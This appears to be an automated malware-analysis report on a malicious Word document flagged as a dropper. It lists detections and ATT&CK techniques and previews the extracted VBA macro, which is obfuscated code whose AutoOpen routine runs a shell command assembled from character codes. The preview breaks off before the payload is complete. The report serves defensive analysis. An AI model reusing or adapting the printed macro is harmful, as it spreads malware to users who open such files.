MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is a critical finding. ClamAV identifies the file as 'Doc.Dropper.Valyria-6666918-0', indicating it functions as a dropper. The VBA script's primary function appears to be executing a shell command, likely to download and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Valyria-6666918-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6666918-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26922 bytes |
SHA-256: 5adde04dcb38dca0be0ee84b7de81c1fe712a7efd5c8b336b18185b64f3d73cc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OmoMQRWfuf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CStr(mFQPq / nsAFk * 64898 + iiEnm)
TypeName CLng(wwWpTZ)
TypeName Int(udQoj / kizjB)
TypeName 5937
TypeName 303
TypeName CDbl(71114 + OUREb)
VBA.Shell# KeyString(RALlaOrZSCpVQ + biWfFsTEztJmH + vbKeyC + NvRCLPcvtW + NwuSimhNkDi) + zvLrRbjKwpuDNz + ncJOSFFFbazaBk + falHjwul + OuZZdNNq + LnVCn + ljsHIsKHR + LNzmAdu + GwtqTZLtTv + UClrdBdrK + tFpib + NmGinE + sKkuIpnFqC + IlZiOizKKkQ + mLrquNCUiHi + rCVWhVtKLp + DZvRSjKuhX + GivVFWG + twBbWcQYM + XUnHaXScvO + JAPUpHOwb + hrpGQrcIJ, 994506110 - 994506110
TypeName Tan(hSKjFh)
TypeName OHCqw
End Sub
Attribute VB_Name = "FJTmninS"
Function falHjwul()
On Error Resume Next
TypeName CSng(28529 / clnbd)
TypeName Sqr(2032)
TypeName CDate(482835542)
ERECIaAIMj = "md" + " /" + "V " + " " + " /" + CStr(Chr(bLkOrzTo + fjIKFoKTWcUnq + 67 + qEtzDLAzF + wCDpNYFiKwQz)) + " " + " " + CStr(Chr(lkvSsnVlu + ZpchijCHUsHPh + 34 + hLnWaHfjSaFjMP + HDwnjdwj)) + "s" + "et" + " " + " " + " " + " a"
TypeName Round(58345 + hEIFv)
TypeName 9462
TypeName Log(EWWcmO)
hJWnQApPCbz = "m" + CStr(Chr(qtWiVODzG + YZluFKHYAprEiz + 99 + bMEPHGMQmNnE + PJFMjiLtdSp)) + "S=M" + "jI" + "MT" + "vS" + "s" + "U" + "G" + "Xs" + "usG"
TypeName briLLM
TypeName Rnd(taCwZ)
TypeName 110005226
ImWJrrCfDS = "z" + CStr(Chr(YzooiKdbk + qRMUHsWChXZizW + 108 + ZijmaAroRzZJ + BfHKVSSql)) + "Zqa" + "O" + "Ux" + "g,A" + "{" + "w.D" + "$N" + "o" + "8=6" + "i\f" + "m:"
TypeName ChrW(zKQWp / 7399)
TypeName GwOqJV
cLNwzAOBo = ")/" + CStr(Chr(mZrwQpSOdDtBPU + XDKTNITWua + 67 + zOjwwqn + qAIHuQKHdsqisu)) + CStr(Chr(RidGVDqARRP + DZjQahCBMTsJOR + 99 + WEUwVjIKUimKHq + pLZSKOS)) + "4" + "+7" + "P@b" + "hkH"
TypeName Log(GWDRj)
TypeName 216
TypeName NOpaKK
zRcCpFMvisW = "W}" + "e" + "J" + "rF5" + "-Y" + "p" + ";yn" + " " + "0"
TypeName 8
TypeName OPcFN
TypeName Fix(71)
tqBGDlOSNE = "d9" + "'" + "t(" + "&&" + " " + " " + "for" + " " + " %" + CStr(Chr(ZFPlwGmHCuMu + XRWvwurtWqr + 67 + rPnImHM + sZXXACFvQGS)) + " " + "i"
TypeName Oct(LwmLw)
TypeName lCzZtO
TypeName wLSqP
qzqTP = "n" + " ( " + " " + "63" + " ," + "32 " + " ," + " 2" + "7" + " " + ", 5" + "6, "
falHjwul = ERECIaAIMj + hJWnQApPCbz + ImWJrrCfDS + cLNwzAOBo + zRcCpFMvisW + tqBGDlOSNE + qzqTP
TypeName ChrB(339510554)
TypeName ChrW(4)
TypeName Oct(japlSl)
End Function
Function OuZZdNNq()
On Error Resume Next
TypeName Ttnjo
TypeName dZFna
TypeName Uzrzj
XWLHYziTMj = " " + " 58" + " " + " ," + " " + " 13" + " ," + "5" + "1 " + " " + ", 5" + "6 " + " ,"
TypeName SlPZQw
TypeName ChrW(FAcfs * 28621 - 37996 + duKWBi)
TypeName ChrB(204570215)
MKCWwsYG = "16" + " " + " " + ", " + " " + "1" + "6 " + "," + " 6" + "7"
TypeName CInt(pMDof)
TypeName 679
TypeName Atn(3036)
TQXsquHTcP = " " + ",3" + "0 " + ", " + " 1" + "7" + ","
TypeName Oct(ROwXu)
TypeName 3
TypeName sjGkkK
iaqkvMhPVB = "66 " + ", 4" + "4" + " " + " ," + " 34" + "," + " "
TypeName CInt(MGQDU)
TypeName Chr(31)
TypeName HNmVZD
UKGLiH = " " + " 6" + "6," + "5" + "6 " + " ," + " " + " "
TypeName CStr(CWiXP + UqOzk + 8728 + 3267)
TypeName Sqr(rZkKzw)
TypeName Hex(3554)
HbqdSZLcIu = " " + "27" + " " + " , " + " " + " 61"
OuZZdNNq = XWLHYziTMj + MKCWwsYG + TQXsquHTcP + iaqkvMhPVB + UKGLiH + HbqdSZLcIu
TypeName hWMTc
TypeName zifRi
TypeName CDbl(21)
End Function
Function LnVCn()
On Error Resume Next
TypeName NGULCL
TypeName CLng(MRDGNG)
TypeName Hex(37)
wPGofZwN = " ," + " " + " " + "3" + "2 "
TypeName irIWl
TypeName CBool(75869 + DjGRJc * 84949 - mqasN)
wWuTPu = " ," + " " + "50" + ", " + " " + " " + " "
TypeName Log(245649738)
TypeName wtMkc
TypeName 112
DssWCw =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.